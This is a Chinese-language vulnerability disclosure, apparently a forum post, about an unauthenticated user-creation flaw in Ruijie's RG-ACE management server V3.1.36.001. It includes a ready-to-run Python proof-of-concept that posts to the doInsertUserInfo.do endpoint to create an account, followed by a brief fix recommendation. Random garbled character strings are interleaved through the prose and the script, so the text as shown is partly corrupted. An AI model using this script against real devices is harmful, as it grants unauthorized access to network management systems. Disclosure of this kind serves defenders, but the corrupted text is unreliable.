锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）


测试的具体版本是
& y7 v& r& \' ]. t* F产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
0 }; T  U% x* H* K2 i编译时间: 201104291730


' d7 ?) L; ]1 J- Q漏洞证明：
9 x' n8 U9 g- \8 G
% v. C: c' o+ y8 ~



9 m! y, C6 }0 g+ u' o$ F; }  W
5 K- K' {; s- U. R执行脚本
#! /usr/bin/env python
. e( m  d- @, q# R#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
/ Z: d$ c, p4 P6 b$ [2 ?0 H& o7 dopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
3 V8 [" n( A& D$ Q% f. I; }("useropermanager","userManager"),
("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
$ c+ a" H+ y- m! |6 ?/ }("trueName","ad"),
("email",""),
("mobilePhone",""),
("officePhone",""),
& D! u& z- V  ^; j- v# R- z8 S, \("addr",""),
+ F) F9 k; ]$ ]: b( H$ D("submit","确定"))
# R; C2 g2 p& B" X3 {+ qurllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
8 y0 u) P5 a' Y. \5 Rprint "Done"
& A! }6 K9 b/ K6 x  g! M2 E
* {: B4 ^  _- P- U  v2 w登录，连接设备
+ z; z' Y/ D( ?$ M3 }1 C- y/ i+ j
/ _* L& O% N( r* @  A+ T5 Z5 N" ~$ M
+ u/ U1 t  L6 ^
# w5 |9 X/ R' G

, }0 w  I; Z3 z& ?, ?/ ~5 S4 }默认的管理员admin权限更大点





! [8 J* g  _( y0 U& g0 M3 G1 N6 {修复方案：
$ U: I% d6 i: ]$ S) I, }4 [; o加强对接口的权限验证